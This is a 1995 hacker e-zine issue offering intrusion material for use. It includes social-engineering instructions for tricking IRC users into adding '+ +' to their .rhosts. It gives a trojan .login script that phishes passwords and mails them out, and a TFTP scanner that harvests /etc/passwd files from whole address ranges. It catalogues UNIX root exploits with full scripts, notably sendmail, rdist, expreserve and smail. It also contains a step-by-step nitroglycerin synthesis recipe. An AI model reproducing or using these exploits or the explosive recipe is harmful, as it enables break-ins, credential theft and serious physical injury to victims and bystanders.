Copy Link
Add to Bookmark
Report
Time for a Change Issue 1
TYM - Taking Your Machine
PRESENTS
-+-+-====================================================================-+-+-
____________ ____ _____ _____ _________
/\____ ____\ /\ \ /\ \ /\ \ /\ _____\
\/___/\ \___/ \ \ \ \ \ \\ \ \ \ \___ /
\ \ \ \ \ \ \ \ \\ \\ \ \ \ __\
\ \ \ \ \ \ \ \ \ \__\ \ \ \ \ \_/___
\ \__\ \ \___\ \ \__\/__/\ \__\ \ \_______\
\/__/ \/___/ \/__/ \/__/ \/_______/
_________ ______ ________ _________
/\ _____\ /\ __ \ /\ __ \ /\ ___ \
\ \ \___ / \ \ \/\ \ \ \ \_\ \ \ \ \_/\ \
\ \ __\ \ \ \ \ \ \ \ / \ \ \\_\ \
\ \ \_/ \ \ \_\ \ \ \ \\ \ \ \ ___ \
\ \__\ \ \_____\ \ \__\\_\ \ \__\_/\__\
\/__/ \/_____/ \/__//_/ \/__/ \/__/
________ ___ ___ ________ _____ ___ ________ _______
/\ ____\ /\ \ /\ \ /\ __ \ /\ \ /\ \ /\ ____\ /\ ___\
\ \ \ \ \ \\_\ \ \ \ \/\ \\ \ \ \\ \ \ \ \ \_ _/_\ \ \__/
\ \ \ \ \ ___ \ \ \ \_\ \\ \ \\ \ \ \ \ \ \/\_ \\ \ _\
\ \ \____ \ \ \_/\ \ \ \ __ \\ \ \/\ \\ \ \ \ \/_\ \\ \ \/__
\ \______\ \ \__\\ \__\ \ \__\ \__\\ \__\//\_____\ \ \_______\\ \_____\
\/______/ \/__/ \/__/ \/__/\/__/ \/__/ \/_____/ \/_______/ \/_____/
-+-+-====================================================================-+-+-
Time For A Change
Volume 1 - Issue 1
February 23, 1995
-+-+-====================================================================-+-+-
INTRODUCTION
____________
Well, here is our first, long awaited issue. For those of you who don't know
me, I'm Ghost in the Machine. I've been around the "scene" forever and a
day, and I am quite sick of what it has degenerated into.
This magazine is an attempt to break away from the no-disclosure bullshit
and give everyone all the info they need to do whatever they want to do.
This is an attempt at full-discolure, useful information, while hopefully
remaining entertaining to read.
Submissions for this magazine are accepted from anyone who has the desire to
write an interesting article, and also has the ability to do so. Send your
submissions to:
Ghost in the Machine @ Hackers Haven BBS (303) 343-4053
or bf130@freenet.hsc.colorado.edu (Don't laugh, it's a stable maildrop)
You can also feel free to drop any comments, suggestions, complaints,
etc.. off at either of those places.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
TABLE OF CONTENTS:
1. Finding new domains and playing with them.............Ghost in the Machine
2. Fun stuff to do on IRC................................Terminal
3. Pyrotechnics for the Serious Student:Nitro-Glycerine..Murcurochrome
4. UNIX Problems for fun and exploit: Part 1.............Ghost in the Machine
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-----------------------------------------------------------------------------
Time for a Change
presents
Finding new domains and playing with them.
by
Ghost in the Machine
+----------------------------------------------------------------------------+
If you're like me, you will occasionally find yourself bored and want to
find someplace new to hack. Coming up with a domain that you haven't
already visited might be giving you some headaches, I know it gives them to
me.
Here are some pointers on how to find new systems, what to do once you have
found one to gain easy access (if it exists), and some other neat net tools
that you might not be familiar with.
-
FINDING DOMAINS
-
If you are on a system with any activity at all, you will find it easy to
find new hosts by just checking the processes running on your host.
do a
% ps -aux | grep telnet
or even better, look at all the processes and pipe it through more.
% ps -aux | more
A lot of times, you will get people telnetting, rlogin'ing etc.. to
different places.. a lot of times they are muds or whatever, which is kinda
lame, but hell, it's someplace to start.
+
% finger @<anotherhost.that.you.know>
This will give you a list of all the people logged in, and many times, where
they are on that host from. There are usually a handful from someplace
nowhere near the host that you are fingering.
+
Read usenet. Preferrably *security* newsgroups, as often times, stupid
admins will leave valuable system weaknesses in posts, along with their
login name, and host.
+
Jump on to IRC. Join random, heavily populated channels. Do a
/who #<channelname> .
There should be a hefty load of new domains in just that. Some channels that
usually have a lot of people on domestic machines are:
#talk
#
#warez-#warez9 (these are usually filled with clueless wonders too, always a
good time)
#<any ethnic group you can imagine>
+
Get on the www. Check out where the links are taking you, alas more domains
to play with. Usually chock full of usernames.
+
I'm sure you can come up with plenty of other variations on this theme.
Finding domains is easy, just pick something that appeals to you, and go at
it.
-
USING YOUR NEW DOMAINS
-
Ok, the first thing you might want to do once you find a new domain is scan
it for easily hacked backdoors. ISS (Internet Security Scanner) is a program
that will do this for you, SATAN is another. I will include a uuencoded gzip
of ISS 1.21 source with this issue. If you're really bored, you can scan by
hand.
Important Note: Never, NEVER scan a domain with a non-expendable account.
Most of the things that ISS does are easily logged and quite noticable.
+
Question: I have a domain name, but I need the IP address to use with ISS.
Answer: Use nslookup - nslookup is a program that will attach to a
nameserver and translate domain to IP and vice versa. It's very easy to use.
type nslookup
Then at the > prompt, type either fully qualified host names, or ip
addresses. It will spit the info you desire.
+
Question: Is there a way to easily scan a domain for default accounts?
Answer: Yes - netfind
netfind is a handy program for finding accounts without actually entering
the system. It is very versatile, and very helpful.
% man netfind
for complete instructions.
+
These are some easy ways to find stuff. I hope you find them useful.
-----------------------------------------------------------------------------
Time for a Change
presents
Fun stuff to do on IRC.
by
Terminal
------------------------------------------------------------------------------
The Intro:
By writing this text i intend to share some simple ideas on gaining
accounts, and access on other systems while pissing around on IRC.
I assume, you the reader have a little experience with the commands
of IRC... I dont know why, but I do...
So lets get on with it.
The Beginning:
To find a person on a system of your choice try: /who -host <system name>.
For example: "/who -host *att.com" would find all users on IRC coming
from any host on ATT.COM.. Wildcards are indeed excepted. So find a victim
that way, or if you are less picky, just join any channel, preferably one
with a few users, and do a: "/who *".. that will list all users in the
channel with nick, and mailing address... So, chose a user that looks
interesting, and move on.
The Idea:
Well, we are just trying to accomplish one thing... to get the user to add
"+ +" to his or her .rhosts file.. making any system a 'trusted' host, then
allowing us, to rlogin (Remote Login) to his or her system with no
password... So, we have a few choices.. as you may have seen there are some
popular IRC scripts..IRC scripts are used by many people on IRC for whatever
reason or another. and to get into there system you need only to add a line
to a popular IRC script, or make your own.. the line you would want to add,
would look like this: "exec echo + + > $HOME/.rhosts"... You dont have to
have to give them an IRC script to get them to fix there .rhosts.. with
a stupid user, and a bit of luck, you can have the user type it in himself.
When actually typed while in IRC, you would need to add a '/' to
the whole thing, making it: "/exec echo + + > $HOME/.rhosts"... Once the
'+ +' is added to the .rhosts, you need only, exit to shell.. and type:
"rlogin <victims system> -l <victims username>".For example, to rlogin to
joblo@anysystem.com, you would need to type: "rlogin anysystem.com -l joblo"
from your shell...
The Example:
*Victim* Dude, do you have any IRC scripts??
/whois Victim
*** Victim is victim@any.system.net (John Doe)
*** on channels: #oralsex
*** on irc via server irc-2.mit.edu ()
/exec echo "exec echo + + > $HOME/.rhosts" >> fenix.irc
/dcc send Victim fenix.irc
*** Sent DCC SEND request to Victim
*** DCC SEND connection to Victim[123.456.0.0,1383] established
*** DCC SEND:/home/myuser/fenix.irc to Victim completed 0.04004 kb/sec
/msg victim just type: /load fenix.irc
-> *victim* just type: /load fenix.irc
*Victim* Ok, I did... thanks.
/msg victim no problem.
-> *victim* no problem.
/quit I am lame
*** Signoff: me (I am lame)
% rlogin any.system.net -l victim
Last login: Tue Feb 14 16:49:42 from secure.bellcore.com
SunOS Release 4.1.3 (ANY) #2: Fri Sep 9 06:12:28 PDT 1994
Default terminal emulation is vt100
For temporary storage please use /tmp
You have mail.
ANY% ls
misc_porno littleboy_nudes
ANY% exit
Connection closed.
%
The Other Idea:
if you want to try something different, You could give out a .login 'trojan'
shell script, that when run replaces the users .login file with a script
wich when the user logs in next, will make it look like the user entered
a wrong login name or password, and will prompt them to reenter it...
What ever is inputed then, is mailed to the address in the script, so
you would want to modify it, with your own mailing address...
You could distribute the script as anything you like, but it isnt an IRC
script, so it needs to be run from the users shell... If you are rlogined
to someones account, you may want to run this on their account to try
and get their passwd...
The Script:
----START SCRIPT----
#!/bin/sh
rm -rf $0
cp $HOME/.login $HOME/.l
echo ''>$HOME/.hushlogin
echo "stty intr '^@'
echo 'Login incorrect'
echo -n 'login: '
echo $<>.t
echo -n 'Password: '
stty -echo
echo $<>>.t
mail yourname@your.mail.account.com<.t
rm .t
cat /etc/motd
mv .l .login
rm .hushlogin
stty echo
source .login">$HOME/.login
----END SCRIPT----
===========================================================================
Time for a Change
presents
Pyrotechnics for the Serious Student
Part I: Nitro Glycerine
by
Murcurochrome (303)
------------------------------------------------------------------------------
Being the most experienced and knowledgable pyrotechnic in the
state, I figured that it would be in all of our best concerns for me
to write this article, instead of some lame-ass who steals all his
ideas from the Anarchist Cookbook or the Terrorist Handbook without even
trying any of them. I have made numerous explosives in my time, and now
it is time for me to share them with you. I will be submitting new
articles to each TYM release, and they will each include one recipe for
some type of explosive.
First off, I have to say that I am in NO FUCKING WAY responsible
for any dismemberment, or other harm that may come to you or anyone else.
It's not my fault if you picked up this article and decided that you were
a terrorist. For this reason, I have rated each one twice. One for
difficulty in making, and one for danger in creating/using it. So, that's
all I can do to make sure that you dumbasses don't think that nitroglycerin
is easy and fun to make. So, lets begin.
Nitroglycerin C3H5(NO3)3 -------------------------------
Difficulty level [09] Danger level [10]
--------------------------------------------------------
Nitroglycerin is the most dangerous and most potent explosive
that I am going to teach you in this article. It is highly volitile to
bumps and jiggles, so I suggest that you merely read this article for the
fun of knowing it, rather than actually making it. I've only made it a few
times, and got away with it, but for you, it could prove dangerous.
[01] Fill a 75-ml beaker to the 13ml line with fuming red nitric acid, of
98% concentration.
[02] Place the beaker in an ice bath. Let it cool down below room
temperature.
[03] When it's done cooling, add it to 3x the amount of fuming sulfuric
acid (of 99% concentration).
[04] When done mixing, lower the temperature by adding more ice to the
bath, to about 10-15øC
[05] When the solution has cooled, it is ready to add glycerin. Be sure
to add the glycerin slowing, THROUGH A MEDICINE DROPPER, ONE
DROP AT A TIME. Do this carefully, until the entire surface
of the solution is covered in glycerin.
[06] Nitration will begin as soon as the glycerin is added. This will
produce heat, but you MUST keep the solution below 30øC. If
it begins to go higher, take the beaker out and pour it in
the ice bath. This will prevent an explosion.
[07] For the first 10 minutes of nitration, stir gently. Normally, a
layer of nitroglycerin will form on top of it all.
[08] After nitration, the entire beaker should be transferred SLOWLY
and CAREFULLY to another beaker of water. The nitroglycerin
should go to the bottom, and the excess acid and water can
be drained off.
[09] After removing as much acid as possible (* be sure not to disturb
the nitroglycerin, it is highly volital at this point *),
remove the NG with an eyedropper and place it in a sodium
bicarbonate solution. This will neutralize most of the
remaining acid. Keep doing this step, and testing with
blue litmus paper until it shows no acid.
[10] Finally, remove the NG from the bicarbonate with an eye dropper.
Must I remind you to do this SLOWLY and CAREFULLY?
NG has a very short shelf life, and is extremely unstable.
The best way to keep NG around, is to convert it to dynamite by adding
sawdust, or soap shavings.
-----------------------------------------------------------------------------
Time for a Change
presents
UNIX problems, for fun and exploit. Volume 1.
(or how to get root in less than 5 minutes.)
by
Ghost in the Machine
------------------------------------------------------------------------------
Well, I have yet to see a definative guide to UNIX bugs, holes, etc.. with
exploits, so I feel confident that I am not beating a dead horse with this
series.
Everyone seems to want to hack *NIX, and although the majority of bugs,
holes, and other problems are easy to find if you know where to look, most
people do not have any idea where to start looking. This series should give
even the most incurably lame people a starting point.
The current plan is to make this a 4 part series, however, as more and more
goodies show up, one never knows.
Basically, here is an example for the format of the file:
<Type of OS, or *NIX for all> (vers) - <Type of bug/hole> - <Comments (if any)>
:
<Exploit Example>
+++++
<Next listing>
------------------------------------------------------------------------------
AIX (all?) - /bin/tprof - tprof -x executes programs suid 0 - root in 16
characters, how can you lose?
:
% tprof -x /bin/sh
#
+++++
AIX (2.2.1) - /etc/shadow - /etc/shadow is o+w - Big oopsie. Thanks IBM!
:
% echo "rewt::0:0:blahness:/:/bin/sh" >> /etc/shadow
% telnet localhost
Trying...
Connected to haqdnfuqd.com.
Escape character is '^]'.
login: rewt
#
+++++
AIX (3.X.X) - -froot - rlogind hole
:
% rlogin localhost -l -froot
#
+++++
BSD (4.2), ULTRIX (3.0) - symbolic links broke - view any file you care to.
:
% ln -s /etc/shadow /home/looser/.plan
% finger looser
Login: looser Name: looser
Directory: /home/looser Shell: /bin/sh
Last Login Fri May 13 22:10 (EST) on ttya1
No Mail.
<contents of /etc/shadow>
+++++
DYNIX (3.0.14), ULTRIX (2.X) - sendmail bug - Can read any file.
:
$ sendmail -C /etc/shadow
<contents of /etc/shadow>
+++++
DYNIX (all?), IRIX (all?) - rsh problem - can execute commands as root.
:
$ rsh localhost -l "" /bin/sh
#
+++++
HP/UX (below 7.0) - chfn problem - chfn accepts newlines, etc...
:
% chfn -f looser^Mrewt::0:0::/:/bin/sh
% rlogin localhost -l rewt
Warning: .lastlogin not found.
#
+++++
UNIX sendmail (Confirmed on SunOS perhaps others) - decode alias - uudecode
:
% telnet fuqdhost.com 25
220 fuqdhost.com SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 <bin> ... Sender Okay
RCPT TO: decode
250 <decode> ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R K"O\
end
.
250 Mail accepted
quit
221 fuqdhost.com closing connection
Connection closed by foreign host.
% rlogin fuqdhost.com -l bin
$
+++++
UNIX ALL - tftp - Can be used to grab /etc/passwd or any file you like - Most
systems have fixed this.
:
% tftp fuqdhost.com
tftp> get /etc/passwd
tftp> quit
% ls passwd
passwd
%
(For your scanning pleasure, I am including a short script written by Yo)
-------------------------------CUT HERE-------------------------------------
#!/bin/sh
########################################################################
# TFTP snagger by Yo
# It snags /etc/passwd files from all hosts with open 69 (tftp) port.
# scanns all hosts from XX.XX.0.0 - XX.XX.255.255
# you can run it in the background in following way:
# snag [hostname] > /dev/null &
# [hostname] might be used IP # (with -ip option) as well as FQDN
#
#########################################################################
if [ $1x = x ]; then
echo " Usage: $0 [hostname] to run in the foreground "
echo " $0 [hostname] > /dev/null & to run in the background "
echo " The [hostname] can be specialized in fully qualified domain name "
echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
echo " as well as IP with -ip option. "
exit 1
else
if [ "$1" = '-ip' ]; then
if [ $2x = x ]; then
echo " Usage: $0 $1 the IP "
exit 1
else
x=`echo $2 | cut -c1-3`
x1=`echo $x | cut -c2`
if [ "$x1" = '.' ]; then
x=`echo $x | cut -c1`
xx=`echo $2 | cut -c3-5`
else
x1=`echo $x | cut -c3`
if [ "$x1" = '.' ]; then
x=`echo $x | cut -c1-2`
xx=`echo $2 | cut -c4-6`
else
xx=`echo $2 | cut -c5-7`
fi
fi
x1=`echo $xx | cut -c2`
if [ "$x1" = '.' ]; then
xx=`echo $xx | cut -c1`
else
x1=`echo $xx | cut -c3`
if [ "$x1" = '.' ]; then
xx=`echo $xx | cut -c1-2`
else
xx=`echo $xx | cut -c1-3`
fi
fi
fi
else
if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then # -x is for SunOs
echo sorry dude, no nslookup server .. try it with -ip option.
exit 1
fi
x=`nslookup $1 | fgrep "Address" | cut -c11-13 | tail +2`
x1=`echo $x | cut -c2`
if [ "$x1" = '.' ]; then
x=`echo $x | cut -c1`
xx=`nslookup $1 | fgrep "Address" | cut -c13-15 | tail +2`
else
x1=`echo $x | cut -c3`
if [ "$x1" = '.' ]; then
x=`echo $x | cut -c1-2`
xx=`nslookup $1 | fgrep "Address" | cut -c14-16 | tail +2`
else
x=`echo $x | cut -c1-3`
xx=`nslookup $1 | fgrep "Address" | cut -c15-17 | tail +2`
fi
fi
x1=`echo $xx | cut -c2`
if [ "$x1" = '.' ]; then
xx=`echo $xx | cut -c1`
else
x1=`echo $xx | cut -c3`
if [ "$x1" = '.' ]; then
xx=`echo $xx | cut -c1-2`
else
xx=`echo $xx | cut -c1-3`
fi
fi
fi
fi
if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
echo There is no such domain. Nothing to scan .
exit 1
fi
xxx=0
xxxx=0
while [ $x -ne 255 ]; do
while [ $xx -ne 255 ]; do
while [ $xxx -ne 255 ]; do
while [ $xxxx -ne 255 ]; do
target=$x.$xx.$xxx.$xxxx
trap "echo The Process was stoped at $target;rm -rf passwd; exit 1" 2
tftp << EOF
c $target
mode ascii
trace
get /etc/passwd passwd
quit
EOF
if [ ! -s passwd ] ; then
rm -rf passwd
echo `date` $target has rejected an attempt >> .info
else
mv passwd .good.$target
echo `date` $target is taken,all data is stored in .good.$target file >> .info
fi
xxxx=`expr $xxxx + 1 `
done
xxxx=0
xxx=`expr $xxx + 1 `
done
xxx=0
xx=`expr $xx + 1 `
done
xx=0
x=`expr $x + 1 `
done
---------------------------------CUT HERE-----------------------------------
+++++
SunOS (<4.1.2), A/UX (2.0.1), SCO (3.2v4.2), Many others. - rdist(1) problem -
Any user with access to rdist(1) can become root.
:
% cat > distfile
HOSTS = fuqdhost
FILES = w00p
${FILES} -> ${HOSTS}
install /tmp/1;
notify user;
^D
% cat > usr.c
main()
{
setuid(0);
chown("goodie", 0, 0);
chmod("goodie", 04755);
exit(0);
}
^D
% cp /bin/sh ./goodie
% cc -o usr usr.c
% set path=( . $PATH)
% setenv IFS /
% rdist
updating host localhost
rdist: w00p: no such file or directory
notify @fuqdhost ( user )
% goodie
#
+++++
UNIX (with rdist) - rdist buffer overflow hole - Make an suid shell.
:
<rdist.sh script follows>
----------------------------------CUT HERE----------------------------------
#!/bin/sh
SUID=/tmp/xtrek
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
echo "$SUID is a setuid shell. "
fi
#
----------------------------------CUT HERE-----------------------------------
% rdist.sh
/tmp/xtrek is a setuid shell.
% /tmp/xtrek
#
+++++
UNIX (Many) - getpwent() hole - get /etc/shadow file. (not usually)
:
% cat > unshadow.c
#include <pwd.h>
main(){struct passwd *p;while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n\r", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);}
^D
% cc -o unshadow
% unshadow > gotcha
% cat gotcha
<contents of shadow file>
+++++
UNIX (elm - all versions) - autoreply bug - any user with access to
autoreply can become root.
:
<fixrhosts script follows>
--------------------------------CUT HERE------------------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
echo "Usage: `basename $0` rhosts-file user machine"
exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
autoreply "a
$MACHINE $USERNAME
b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
--------------------------------CUT HERE------------------------------------
% ./fixrhosts ~root/.rhosts looser fuqdhost
You've been added to the autoreply system.
You've been removed from the autoreply table.
% rsh fuqdhost -l root csh -i
#
+++++
UNIX (smail) - debug mode hole - Use of ~/.forward and debug lets a local
user read any file on the system.
:
% ln -s /etc/shadow .forward
% ls -la .forward
lrwxrwxrwx 1 looser lusers 11 Sep 5 12:08 .forward -> /etc/shadow
% telnet localhost smtp
Trying 127.0.0.1...
Connected to fuqdhost.
Escape character is '^]'.
220 fuqdhost.lame.com Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 EST
debug 20
250 Debugging level: 20
expn looser
[lots of crap]
expand_string(~/.forward, /home/looser, looser) called
expand_string returns /home/looser/.forward
dtd_forwardfile: opening forward file /home/looser/.forward
[more crap]
read 890 bytes
director dotforward: matched looser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
looser:qWerTy3210xXx:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 looser ... not matched
quit
221 fuqdhost.lame.com closing connection
Connection closed by foreign host.
+++++
UNIX (smail) - smail create/append hole - Smail called with the -D flag will
allow you to create and append to any file on the system.
:
% cat ~/.forward
localhost loser
^D
% smail -bs -D ~root/.rhosts -v20
220 fuqdhost.lame.com Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 EST
expn looser
250 looser
quit
221 fudqhost.lame.com closing connection
% rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
#
+++++
UNIX (smail) - .forward problem - Files specified in ~/.forward can be created
in any directory, regardless of it's permissions. (File is still owned by
mailbox owner, however.)
:
% echo "/etc/nologin" > ~/.forward
% mail -r root loser < /dev/null
% echo "Site shutdown due to smail lameness" >! /etc/nologin
% rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.
+++++
UNIX (expreserve) - expreserve bug
:
<xp.c source follows>
----------------------------------CUT HERE-----------------------------------
/*
* Exploit a security hole in expreserve on sun4.1.3
* <program> filename
* overwrites filename as root with garbage, chown's to you
* (note, a 4.1.1 test overwrote with no chown
* the first 4 characters written are "+ +\n"
* which can be used to overwrite anyones .rhosts as root)
*/
#include <pwd.h>
#include <fcntl.h>
#define HBLKS 2
#define FNSIZE 128
#define BLKS 900
typedef struct {
time_t time;
int uid;
int flines;
char name[FNSIZE];
short Blocks[BLKS];
short encrypted;
} header;
main(argc,argv)
int argc;
char **argv;
{
int p,u;
header H;
struct passwd *pw;
char buf[100],*dest;
if(argc!=2) {
printf("usage: %s destination\n",argv[0]);
exit(1);
}
dest = argv[1];
p = getpid();
pw = getpwuid(getuid());
sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
symlink(dest,buf);
close(0);
if(open("./Ex",O_RDWR|O_CREAT,0666)<0) {
printf("Cant open Ex (temp file)\n");
exit(2);
}
/* fill out header so that expre thinks its legit */
H.time = 12345; /* who cares */
strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/
strcpy(H.name,"NoName");
H.flines = 0;
H.uid = getuid();
H.Blocks[0] = HBLKS;
H.Blocks[1] = HBLKS+1;
write(0,&H,sizeof(H));
lseek(0,0,0);
printf("Made temp file 'Ex'. You can remove it when done.\n");
execl("/usr/lib/expreserve","expreserve",0);
printf("Couldnt exec!\n");
}
--------------------------------CUT HERE------------------------------------
% cc -o xp xp.c
% id
uid=666(looser) gid=50(luser) groups=50(luser)
% xp /home/doofus/.rhosts
% rlogin fuqdhost -l doofus
% id
uid=303(doofus) gid=50(luser) groups=50(luser)
%
+++++
SunOS 5.2 (sendmail 8.6.X) - sendmail bug - can get a root shell
:
<sm.sh script follows>
---------------------------------CUT HERE-----------------------------------
#!/bin/sh
# exploit new sendmail bug to give us a root shell
# 24 mar 94 jwa/scd @nau.edu
# "short version"
# tested on sunos 5.2/sendmail 8.6.4
# location of sendmail
SENDMAIL=/usr/lib/sendmail
# location of original sendmail.cf file
CONFIG=/nau/local/lib/mail/sendmail.cf
#CONFIG=`strings $SENDMAIL | grep sendmail.cf`
# program to execute as root
SHELL=/bin/csh
TEMPDIR=/tmp/sendbug-tmp.$$
mkdir $TEMPDIR
chmod 700 $TEMPDIR
cd $TEMPDIR
cp $SENDMAIL sm
chmod 700 sm
echo "Creating setid0 ..."
cat > setid.c << _EOF_
/* set uid to zero, thus escaping the annoying csh and solaris sh
* problem..
*
* if (getuid() != geteuid()) {
* printf("permission denied, you root-hacker you.\n");
* exit(1);
* }
*
* .. must be run euid 0, obviously. with no args it runs /bin/sh,
* otherwise it runs the 1st arg.
*/
#include <stdio.h>
main(argc, argv)
int argc;
char *argv[];
{
int uid;
setuid(0);
setgid(0);
seteuid(0); /* probabally redundant. */
setegid(0);
uid = getuid();
if (uid != 0) {
printf("setuid(0); failed! aborting..\n");
exit(1);
}
if (argc !=2) {
printf("executing /bin/sh...\n");
system("/bin/sh");
}
else
{
printf("executing %s...\n", argv[1]);
system(argv[1]);
}
}
_EOF_
cc -o setid0 setid.c
echo "Creating calc..."
cat > calc.c << _EOF_
/*
* Determines offset in sendmail of
* sendmail.cf file location.
* author: timothy newsham
*/
#include <fcntl.h>
gencore()
{
int pid;
int fd[2];
if(pipe(fd) < 0) {
perror("pipe");
exit(1);
return(0);
}
pid = fork();
if(!pid) {
int f = open("./out", O_RDWR|O_CREAT, 0666);
dup2(f, 1); dup2(fd[0], 0);
close(f); close(fd[1]); close(fd[0]);
execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
perror("exec");
exit(0);
} else {
sleep(2);
kill(pid, 11);
}
close(fd[0]);
close(fd[1]);
}
main(argc,argv)
char **argv;
int argc;
{
unsigned int ConfFile,tTdvect,off;
gencore();
sync(); /* grr. */
tTdvect = find("ZZZZZZZZ", "core");
ConfFile = find(argv[1], "core");
if(!tTdvect || !ConfFile) {
return(1);
}
off = ConfFile - tTdvect;
printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n",
off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \
off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);
}
int find(pattern, file)
char *pattern,*file;
{
int fd;
int i, addr;
char c;
fd = open(file, 0);
i = 0;
addr = 0;
while(read(fd, &c, 1) == 1) {
if(pattern[i] == c)
i++;
else
i=0;
if(pattern[i] == '\0') {
addr -= strlen(pattern);
return(addr);
}
addr++;
}
return(0);
}
_EOF_
cc calc.c -o calc
echo "Scanning core image for $CONFIG..."
DEBUGFLAGS=`calc $CONFIG`
echo "Creating alias.sh ..."
echo "#!/bin/sh
# this program will be executed when mail is sent to the fake alias.
# since solaris sh and csh and tcsh refuse to run when euid != realuid,
# we instead run the program we compiled above.
/bin/chmod 6777 $TEMPDIR/setid0
/bin/chown root $TEMPDIR/setid0
/bin/sync
" > alias.sh
chmod 755 alias.sh
echo "Creating fake alias file..."
echo "yash: |$TEMPDIR/alias.sh" > aliases
echo "Faking alias pointer in new config file..."
egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
echo "
# hacks follow
OA/$TEMPDIR/aliases # our fake alias file
Ou0 # user ID to run as
Og0 # group ID to run as
DZWHOOP-v1.0" >> /tmp/sm.cf
echo "Creating the sendmail script..."
cat > sendmail.script << _EOF_
helo
mail from: <nobody>
rcpt to: <yash>
data
yet another sendmail hole? suid whoop?
\. # oops.. delete \ prior to execution
quit
_EOF_
echo "Executing $SENDMAIL $DEBUGFLAGS -bs..."
$SENDMAIL $DEBUGFLAGS -bs < sendmail.script
# give it time to execute.
sleep 4
# cleanup in 5 seconds
(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &
if [ -u setid0 ]
then
echo "setid0 is a suid shell. executing..."
cd /
$TEMPDIR/setid0 /bin/csh
echo "end of script."
exit 0
else
echo "setid0 is not suid; script failed."
echo "apparently, you don't have the bug. celebrate :-)"
exit 1
fi
---------------------------------CUT HERE-----------------------------------
% sm.sh
<bunch of echo's deleted for brevity>
setid0 is a suid shell. executing...
#
+++++
